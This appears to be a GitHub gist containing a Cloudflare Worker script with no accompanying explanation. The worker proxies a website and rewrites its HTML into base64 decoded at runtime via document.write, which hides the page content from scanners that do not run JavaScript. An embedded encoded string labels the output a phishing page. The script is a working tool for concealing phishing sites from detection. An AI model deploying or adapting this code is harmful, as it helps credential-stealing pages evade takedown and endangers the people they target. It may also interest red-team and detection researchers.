Skip to content

Instantly share code, notes, and snippets.

@vysecurity
Created September 25, 2023 07:20
Show Gist options
  • Save vysecurity/d5466db64f042c5f32a6e0329e39130b to your computer and use it in GitHub Desktop.
Save vysecurity/d5466db64f042c5f32a6e0329e39130b to your computer and use it in GitHub Desktop.
CloudFlare Worker.js
export default {
async fetch(request) {
let whitelist = ['.png', '.jpg', '.js'];
let requestpath = new URL(request.url).pathname;
for (let i = 0; i < whitelist.length; i++){
console.log(requestpath);
if (requestpath.endsWith(whitelist[i])){
return await fetch(request);
}
}
const originalResponse = await fetch(request);
// Change status and statusText, but preserve body and headers
let response = new Response(originalResponse.body, {
status: 200,
headers: originalResponse.headers,
});
// Change response body by adding the foo prop
const originalBody = await originalResponse.text();
const body = originalBody;
const text1=`<!DOCTYPE html>
<script type="text/javascript">
document.write(decodeURIComponent(atob('`;
const text2=`')));
document.write(decodeURIComponent(atob('PCEtLS0tVGhpcyBpcyBhIHBoaXNoaW5nIHBhZ2UtLS0tLT4=')));
</script>
<noscript>You must enable javascript in your browser to view this webpage.</noscript>`
const utf8EncodedText = new TextEncoder().encode(encodeURIComponent(body));
const base64EncodedText = btoa(String.fromCharCode.apply(null, utf8EncodedText));
const decodedText = decodeURIComponent(base64EncodedText);
const body2 = decodedText;
const body3 = text1 + body2 + text2;
response = new Response(body3, response);
return response;
},
};
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment